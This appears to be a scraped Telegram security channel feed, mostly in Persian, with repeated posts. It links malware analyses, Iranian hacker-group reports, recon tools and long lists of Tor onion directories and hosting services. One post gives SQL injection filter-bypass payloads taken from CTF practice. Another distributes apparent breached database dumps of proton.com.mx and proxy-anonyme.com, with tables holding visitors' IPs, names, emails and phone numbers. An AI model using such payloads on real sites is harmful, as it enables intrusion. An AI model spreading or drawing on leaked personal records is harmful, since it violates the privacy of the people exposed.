مهمان این هفته پادکست دارکنِت دایاریز خانم مَدی استون
کارشناس امنیت و از اعضای پروژه صفرشرکت گوکل بود. دراین اپیزود
موضوعات جالبی مثل نحوه شناسایی بدافزارهای اندروید، چگونگی مهندسی معکوس بدافزار های موجود و کشف آسیب پذیریهای روز صفر رو با مدی به بحث وگفتگو گذاشت. یکی از نکات جالب گفتگو مرور اجمالی نحوه کارکرد سیستم Google Play Protect بود که اخیرا نرم افزارروبیکا رو بدافزار تشخیص داد.
https://darknetdiaries.com/episode/127/
کارشناس امنیت و از اعضای پروژه صفرشرکت گوکل بود. دراین اپیزود
موضوعات جالبی مثل نحوه شناسایی بدافزارهای اندروید، چگونگی مهندسی معکوس بدافزار های موجود و کشف آسیب پذیریهای روز صفر رو با مدی به بحث وگفتگو گذاشت. یکی از نکات جالب گفتگو مرور اجمالی نحوه کارکرد سیستم Google Play Protect بود که اخیرا نرم افزار
https://darknetdiaries.com/episode/127/
👍3
اگر علاقه مند به حوزه آنالیز #بدافرار یا همون Malware Analysis هستید، توصیه میکنم این سه گزارش فنی با جزییات بسیار ارزشمند درخصوص بدافزار #پگاسوس Pegasus رو حتما چک کنید.
بخش اول
https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1/
بخش دوم
https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/
بخش سوم
https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/
بخش اول
https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-1/
بخش دوم
https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-2/
بخش سوم
https://cybergeeks.tech/a-technical-analysis-of-pegasus-for-android-part-3/
❤4
Some handy SQLi bypassing i used recently with webCTF challenges
1-
'dal'//UNION//SELECT//*// FROM//users//LIMIT/**/1;
2-
adm'||'in';
3-
admin’;--
1-
'dal'//UNION//SELECT//*// FROM//users//LIMIT/**/1;
2-
adm'||'in';
3-
admin’;--
🔥2❤1
Forwarded from آزمایشگاه بیتبان | BitBaanLab
⭕️ شناسایی بیش از ۳۰۰ نسخه بدافزار مرتبط با واتساپ توسط بیتبان
🧑🏻💻 تیم تحلیل بدافزار بیتبان طبق آخرین بررسیهای خود، تعداد ۳۲۹ نسخه بدافزار اندرویدی را شناسایی کرده، که یا نسخههای جعلی واتساپ بودهاند یا به عنوان ابزارهای کمکی و مرتبط با واتساپ قصد آلوده کردن دستگاه کاربران را داشتهاند.
👾 این بدافزارها بهطور کلی در دستههای مخرب زیر قرار میگیرند:
۱. تروجان
۲. جاسوسافزار
۳. ریسکافزار (AppRisk - PUP/PUA - SPR)
۴. تبلیغافزار (AdLibrary - Notifyer - Adpush - Hiddad - Hiddapp)
🤖 نام نسخههای پرنصب
> GBWhatsApp
> YOWhatsApp
> FMWhatsapp
> ADWhatsApp
> OGWhatsApp
> واتساپ استیکر
> واتساپ یار طلایی
> صفر تا صد واتساپ
> پیام حذف شده واتساپ
> جی بی واتساپ
> اوجی واتساپ
💎 تمامی این بدافزارها توسط اپلیکیشن ضدبدافزار بیتبان شناسایی میشوند.
🌐 اطلاعات بیش از ۲۰۰ نسخه از بدافزارها
🧑🏻💻 تیم تحلیل بدافزار بیتبان طبق آخرین بررسیهای خود، تعداد ۳۲۹ نسخه بدافزار اندرویدی را شناسایی کرده، که یا نسخههای جعلی واتساپ بودهاند یا به عنوان ابزارهای کمکی و مرتبط با واتساپ قصد آلوده کردن دستگاه کاربران را داشتهاند.
👾 این بدافزارها بهطور کلی در دستههای مخرب زیر قرار میگیرند:
۱. تروجان
۲. جاسوسافزار
۳. ریسکافزار (AppRisk - PUP/PUA - SPR)
۴. تبلیغافزار (AdLibrary - Notifyer - Adpush - Hiddad - Hiddapp)
🤖 نام نسخههای پرنصب
> GBWhatsApp
> YOWhatsApp
> FMWhatsapp
> ADWhatsApp
> OGWhatsApp
> واتساپ استیکر
> واتساپ یار طلایی
> صفر تا صد واتساپ
> پیام حذف شده واتساپ
> جی بی واتساپ
> اوجی واتساپ
💎 تمامی این بدافزارها توسط اپلیکیشن ضدبدافزار بیتبان شناسایی میشوند.
🌐 اطلاعات بیش از ۲۰۰ نسخه از بدافزارها
👍1
این گزارش که چند روز پیش منتشرشده یکی از بهترین منابعی است که بطور مختصر و مفید به معرفی گروههای مختلف #هکری وابسته به ج.ا، تکنیکهای مورد استفاده و برخی از مهمترین عملیات سایبری منتسب به اونها پرداخته است.
جالبه که بدونید براساس این گزارش به هفت گروه هکری اشاره شده که از کلمه ’بچه گربه’ یا kitten در نامگذاری آنها استفاده شده. اسامی این هفت گروه عبارت است از:
Charming kitten, Static kitten, Pioneer kitten, Remix kitten, Helix kitten, Refined kitten, and Magic kitten
جالبه که بدونید براساس این گزارش به هفت گروه هکری اشاره شده که از کلمه ’بچه گربه’ یا kitten در نامگذاری آنها استفاده شده. اسامی این هفت گروه عبارت است از:
Charming kitten, Static kitten, Pioneer kitten, Remix kitten, Helix kitten, Refined kitten, and Magic kitten
❤5
Nuclei, httpx, subfinder, dnsx, uncover, cloudlist, Notify, naabu are open source tools by
projectdiscovery.io
You can build an Attack Surface Management automation for 0$
Just little bash or python is needed
projectdiscovery.io
You can build an Attack Surface Management automation for 0$
Just little bash or python is needed
👍4❤1
www.proton.com.mx.sql
251.2 MB
proton.com.mx
id, sitio, ip, urlVisitada, duracion, referencia, Id_Usuario, dispositivo, navegador, so, Plataforma, fecha, hora, Dia
id, url, nombre, mail, tel, mensaje, fecha, navegador, dispositivo
https://web.archive.org/web/20210126072342/http://www.proton.com.mx/
id, sitio, ip, urlVisitada, duracion, referencia, Id_Usuario, dispositivo, navegador, so, Plataforma, fecha, hora, Dia
id, url, nombre, mail, tel, mensaje, fecha, navegador, dispositivo
https://web.archive.org/web/20210126072342/http://www.proton.com.mx/
proxy-anonyme.com_contents.sql
181.5 MB
Proxy-anonyme.com Full site dump. All their proxies are also in files.
🔥3❤2
http://lobuhi.github.io
Search across 6500+ hacking tools and resources from:
Intigrity Newsletter
TL:DR Sec Newsletter
Kitploit
twitter.com/carlospolopm Hacktricks and Hacktricks-Cloud
twitter.com/six2dez Pentest Book
and other sources
Contributor twitter.com/lobuhisec
Search across 6500+ hacking tools and resources from:
Intigrity Newsletter
TL:DR Sec Newsletter
Kitploit
twitter.com/carlospolopm Hacktricks and Hacktricks-Cloud
twitter.com/six2dez Pentest Book
and other sources
Contributor twitter.com/lobuhisec
نرم افزار متن باز Shufflecake یکی از نرم افزارهایی هست که با ایجاد پارتیشن مخفی در هارد دیسک لپ تاپ یا PC میتونه در مخفی نگه داشتن فایلهای حساس مخصوصا برای خبرنگارها و ژورنالیستها بسیار مفید باشه بطوریکه حتی نرم افزارهای دیجیتال فارنزیکز هم کارایی چندانی در مقابلش ندارند.
👏4❤1
موتورهای جستجو Tor: #دارک_وب
Devil Search
http://search65pq2x5oh4o4qlxk2zvoa5zhbfi6mx4br4oc33rpxuayauwsqd.onion/
Excavator
http://2fd6cemt4gmccflhm6imvdfvli3nf7zn6rfrwpsy7uhxrgbypvwf5fad.onion/
GDark
http://zb2jtkhnbvhkya3d46twv3g7lkobi4s62tjffqmafjibixk6pmq75did.onion/gdark/search.php
Hoodle
http://nr2dvqdot7yw6b5poyjb7tzot7fjrrweb2fhugvytbbio7ijkrvicuid.onion/
Kraken
http://krakenai2gmgwwqyo7bcklv2lzcvhe7cxzzva2xpygyax5f33oqnxpad.onion/
Our Realm
http://orealmvxooetglfeguv2vp65a3rig2baq2ljc7jxxs4hsqsrcemkxcad.onion/
Phobos
http://phobosxilamwcg75xt22id7aywkzol6q6rfl2flipcqoc4e4ahima5id.onion/
Sentor
http://e27slbec2ykiyo26gfuovaehuzsydffbit5nlxid53kigw3pvz6uosqd.onion/
TorDex
http://tordexu73joywapk2txdr54jed4imqledpcvcuf75qsas2gwdgksvnyd.onion/
TorLand
http://torlgu6zhhtwe73fdu76uiswgnkfvukqfujofxjfo7vzoht2rndyhxyd.onion/
پیوندها و فهرست های مختلف Tor
از منابع فهرست شده در زیر می توان برای نظارت بر بازارهای تاریک نت و نهادهای غیرقانونی مشابه استفاده کرد. توجه داشته باشید که برخی از اینها حاوی ادغام تصادفی پیوندها هستند.
دایرکتوری های پیوند پیاز به ویژه ممکن است حاوی بسیاری از پیوندهای مرده باشند، بسته به اینکه هر چند وقت یکبار به روز می شوند. برخی از سایتهای جمعآوری نشان میدهند که آیا دامنه مشخصی در حال حاضر فعال است یا خیر، که میتواند در زمان شما صرفهجویی کند.
Dark Catalog
http://catalogxlotjjnu6vyevngf675vu6beefzxw6gd6a3fwgmgznksrqmqd.onion/latest.html
Dark Eye
http://darkeyepxw7cuu2cppnjlgqaav6j42gyt43clcn4vjjf7llfyly5cxid.onion/
Deep Link Onion Directory
http://deepxfmkjlils3vd7bru5rrxy3x3lchjgmv3wsgycjfynktmuwgm64qd.onion/
Deep Links Dump
http://deepqelxz6iddqi5obzla2bbwh5ssyqqobxin27uzkr624wtubhto3ad.onion/
Hidden Links
http://wclekwrf2aclunlmuikf2bopusjfv66jlhwtgbiycy5nw524r6ngioid.onion/
Hidden Reviews
http://u5lyidiw4lpkonoctpqzxgyk6xop7w7w3oho4dzzsi272rwnjhyx7ayd.onion/
Onion link list
http://donionsixbjtiohce24abfgsffo2l4tk26qx464zylumgejukfq2vead.onion/
Onion link online test
http://donionsixbjtiohce24abfgsffo2l4tk26qx464zylumgejukfq2vead.onion/test.php
Signpost
http://signpostcjbbviqdhfbtocj6dthbd7cpvo3tpwrrfhkkk4fafjd53nyd.onion/
Tasty Onions
http://22tojepqmpah32fkeuurutki7o5bmb45uhmgzdg4l2tk34fkdafgt7id.onion/
خدمات میزبانی
آگاهی از چشم انداز ارائه دهندگان میزبانی تاریک نت برای هر محققی مهم است، زیرا همه نهادهایی که می توانند مورد بررسی قرار گیرند باید در جایی میزبانی شوند.
در اینجا چند نمونه از ارائه دهندگان میزبانی با محوریت حریم خصوصی (در موتورهای جستجوی Tor) که در حال حاضر به شدت تبلیغ می شوند و ممکن است برای مجریان قانون یا بازرسان خصوصی آنلاین مورد علاقه باشند، آورده شده است:
Ablative Hosting
http://hzwjmjimhr7bdmfv2doll4upibt5ojjmpo3pbp5ctwcg37n3hyk7qzid.onion/
BitVPS
http://bitvpsj2ojxo7faned27wmpqiss3pny7m7bptwtnegl7fswjrxwtmxid.onion/
Hosting Mate
http://hostmate2s6cudoclklceo6u2jjjilgdz2rfx5r2xuezr26kx2jgl5ad.onion/
Kaizushi
http://kaizushih5iec2mxohpvbt5uaapqdnbluaasa2cmsrrjtwrbx46cnaid.onion/page.php
OnionName
http://onionamev33r7w4zckyttobq3vrt725iuyr6xessihxifhxrhupixqad.onion/
SporeStack
http://spore64i5sofqlfz5gq2ju4msgzojjwifls7rok2cti624zyq3fcelad.onion/
یادگیری و آموزش Tor
ممکن است تعجب آور به نظر برسد، اما Tor مکان خوبی برای یادگیری چیزهایی است - به خصوص چیزهایی در مورد Tor و وب تاریک.
در اینجا ما منابع مناسبی از زمینه های مختلف تخصصی داریم.
Hosting onion services
http://vww6ybal4bd7szmgncyruucpgfkqahzddi37ktceo3ah7ngmcopnpyyd.onion/security/network-security/tor/onionservices-best-practices/index.en.html
Qubes OS Documentation
http://qubesosfasa4zl44o4tws22di6kepyzfeqv3tg4e3ztknltfxqrymdad.onion/doc/
Security in a box
http://lxjacvxrozjlxd7pqced7dyefnbityrwqjosuuaqponlg3v7esifrzad.onion/en/
Tor Guide
http://guideeedvgbpkthetphncab5aqj7dp5t74y7vxsoonnvmaeamq74vuqd.onion/
Whonix Documentation
http://www.dds6qkxpwdeubwucdiaord2xgbbeyds25rbsgr73tbfpqpt4a6vjwsyd.onion/wiki/Documentation
خواندن متفرقه
در اینجا منابعی وجود دارد که نمی توان آنها را به راحتی دسته بندی کرد - وبلاگ ها، تابلوهای بحث، انجمن های کوچک و همه چیز در این بین.
Devil Search
http://search65pq2x5oh4o4qlxk2zvoa5zhbfi6mx4br4oc33rpxuayauwsqd.onion/
Excavator
http://2fd6cemt4gmccflhm6imvdfvli3nf7zn6rfrwpsy7uhxrgbypvwf5fad.onion/
GDark
http://zb2jtkhnbvhkya3d46twv3g7lkobi4s62tjffqmafjibixk6pmq75did.onion/gdark/search.php
Hoodle
http://nr2dvqdot7yw6b5poyjb7tzot7fjrrweb2fhugvytbbio7ijkrvicuid.onion/
Kraken
http://krakenai2gmgwwqyo7bcklv2lzcvhe7cxzzva2xpygyax5f33oqnxpad.onion/
Our Realm
http://orealmvxooetglfeguv2vp65a3rig2baq2ljc7jxxs4hsqsrcemkxcad.onion/
Phobos
http://phobosxilamwcg75xt22id7aywkzol6q6rfl2flipcqoc4e4ahima5id.onion/
Sentor
http://e27slbec2ykiyo26gfuovaehuzsydffbit5nlxid53kigw3pvz6uosqd.onion/
TorDex
http://tordexu73joywapk2txdr54jed4imqledpcvcuf75qsas2gwdgksvnyd.onion/
TorLand
http://torlgu6zhhtwe73fdu76uiswgnkfvukqfujofxjfo7vzoht2rndyhxyd.onion/
پیوندها و فهرست های مختلف Tor
از منابع فهرست شده در زیر می توان برای نظارت بر بازارهای تاریک نت و نهادهای غیرقانونی مشابه استفاده کرد. توجه داشته باشید که برخی از اینها حاوی ادغام تصادفی پیوندها هستند.
دایرکتوری های پیوند پیاز به ویژه ممکن است حاوی بسیاری از پیوندهای مرده باشند، بسته به اینکه هر چند وقت یکبار به روز می شوند. برخی از سایتهای جمعآوری نشان میدهند که آیا دامنه مشخصی در حال حاضر فعال است یا خیر، که میتواند در زمان شما صرفهجویی کند.
Dark Catalog
http://catalogxlotjjnu6vyevngf675vu6beefzxw6gd6a3fwgmgznksrqmqd.onion/latest.html
Dark Eye
http://darkeyepxw7cuu2cppnjlgqaav6j42gyt43clcn4vjjf7llfyly5cxid.onion/
Deep Link Onion Directory
http://deepxfmkjlils3vd7bru5rrxy3x3lchjgmv3wsgycjfynktmuwgm64qd.onion/
Deep Links Dump
http://deepqelxz6iddqi5obzla2bbwh5ssyqqobxin27uzkr624wtubhto3ad.onion/
Hidden Links
http://wclekwrf2aclunlmuikf2bopusjfv66jlhwtgbiycy5nw524r6ngioid.onion/
Hidden Reviews
http://u5lyidiw4lpkonoctpqzxgyk6xop7w7w3oho4dzzsi272rwnjhyx7ayd.onion/
Onion link list
http://donionsixbjtiohce24abfgsffo2l4tk26qx464zylumgejukfq2vead.onion/
Onion link online test
http://donionsixbjtiohce24abfgsffo2l4tk26qx464zylumgejukfq2vead.onion/test.php
Signpost
http://signpostcjbbviqdhfbtocj6dthbd7cpvo3tpwrrfhkkk4fafjd53nyd.onion/
Tasty Onions
http://22tojepqmpah32fkeuurutki7o5bmb45uhmgzdg4l2tk34fkdafgt7id.onion/
خدمات میزبانی
آگاهی از چشم انداز ارائه دهندگان میزبانی تاریک نت برای هر محققی مهم است، زیرا همه نهادهایی که می توانند مورد بررسی قرار گیرند باید در جایی میزبانی شوند.
در اینجا چند نمونه از ارائه دهندگان میزبانی با محوریت حریم خصوصی (در موتورهای جستجوی Tor) که در حال حاضر به شدت تبلیغ می شوند و ممکن است برای مجریان قانون یا بازرسان خصوصی آنلاین مورد علاقه باشند، آورده شده است:
Ablative Hosting
http://hzwjmjimhr7bdmfv2doll4upibt5ojjmpo3pbp5ctwcg37n3hyk7qzid.onion/
BitVPS
http://bitvpsj2ojxo7faned27wmpqiss3pny7m7bptwtnegl7fswjrxwtmxid.onion/
Hosting Mate
http://hostmate2s6cudoclklceo6u2jjjilgdz2rfx5r2xuezr26kx2jgl5ad.onion/
Kaizushi
http://kaizushih5iec2mxohpvbt5uaapqdnbluaasa2cmsrrjtwrbx46cnaid.onion/page.php
OnionName
http://onionamev33r7w4zckyttobq3vrt725iuyr6xessihxifhxrhupixqad.onion/
SporeStack
http://spore64i5sofqlfz5gq2ju4msgzojjwifls7rok2cti624zyq3fcelad.onion/
یادگیری و آموزش Tor
ممکن است تعجب آور به نظر برسد، اما Tor مکان خوبی برای یادگیری چیزهایی است - به خصوص چیزهایی در مورد Tor و وب تاریک.
در اینجا ما منابع مناسبی از زمینه های مختلف تخصصی داریم.
Hosting onion services
http://vww6ybal4bd7szmgncyruucpgfkqahzddi37ktceo3ah7ngmcopnpyyd.onion/security/network-security/tor/onionservices-best-practices/index.en.html
Qubes OS Documentation
http://qubesosfasa4zl44o4tws22di6kepyzfeqv3tg4e3ztknltfxqrymdad.onion/doc/
Security in a box
http://lxjacvxrozjlxd7pqced7dyefnbityrwqjosuuaqponlg3v7esifrzad.onion/en/
Tor Guide
http://guideeedvgbpkthetphncab5aqj7dp5t74y7vxsoonnvmaeamq74vuqd.onion/
Whonix Documentation
http://www.dds6qkxpwdeubwucdiaord2xgbbeyds25rbsgr73tbfpqpt4a6vjwsyd.onion/wiki/Documentation
خواندن متفرقه
در اینجا منابعی وجود دارد که نمی توان آنها را به راحتی دسته بندی کرد - وبلاگ ها، تابلوهای بحث، انجمن های کوچک و همه چیز در این بین.
🔥2👍1